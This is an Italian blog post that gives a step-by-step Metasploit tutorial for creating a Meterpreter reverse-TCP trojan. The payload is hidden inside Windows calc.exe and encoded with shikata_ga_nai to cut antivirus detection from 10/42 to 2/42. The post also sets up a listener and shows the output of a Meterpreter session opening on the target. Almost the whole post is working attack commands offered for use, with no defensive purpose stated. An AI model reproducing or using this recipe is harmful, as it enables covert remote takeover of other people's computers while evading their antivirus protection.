Subme reverse? Metasploit!


Dopo aver assistito a questo video di pura mala-informazione (a parte il consiglio di non utilizzare Internet Explorer che sottoscrivo pienamente):

E dopo aver letto su certi forum penosi di alcune imprese compiute con SubMe Reverse ho dovuto scrivere un articolo (con molta calma, visto che è nelle mie bozze da diversi mesi).

Subme reverse? Metasploit!

Il progetto Metasploit ci regala Metasploit Framework che è il kit del piccolo penetration tester (mica tanto piccolo!).

Dopo averlo installato, insegniamo all’hacker delle iene che poteva risparmiare i soldi del software e figura del lamer che usa XP.

Via!

Visualizziamo le opzioni di configurazione:

msfpayload windows/meterpreter/reverse_tcp O

Specifichiamo il nostro indirizzo ip (il mio era 192.168.1.5), creiamo l’eseguibile “bad.exe” e mettiamolo in /tmp

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 X >/tmp/bad.exe

Questo eseguibile che abbiamo creato, viene però rilevato come infetto da 10/42 antivirus su http://www.virustotal.com

Un buon risultato? Possiamo fare di meglio, alla faccia di tutti i software a pagamento.

Procuriamoci un eseguibile “sano” come la calcolatrice di windows “calc.exe” e poi:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 R | msfencode -x /home/user/calc.exe -t exe -e x86/shikata_ga_nai -c 10 -o bad.exe

Adesso “bad.exe” viene rilevato da 2/42 antivirus… non male!

<Update Monday, November 01 2010: rilevato da 14/43 antivirus.>

Mettiamoci in ascolto:

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.5
exploit

Quando verrà eseguito il file “bad.exe” dal pc bersaglio con Windows, si aprirà la sessione:

msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.5:4444
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.1.6
[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 192.168.1.6:49363) at 2010-07-24 22:03:54 +0200
meterpreter >

Digitate “help” e gustatevi le potenzialità di meterpreter, che ho sviscerato in questo articolo.

One thought on “Subme reverse? Metasploit!

  1. Ho disabilitato i commenti.
    Esistono un sacco di forum per aspiranti lamer e script kiddies, rivolgetevi a loro per ulteriori precisazioni.

Comments are closed.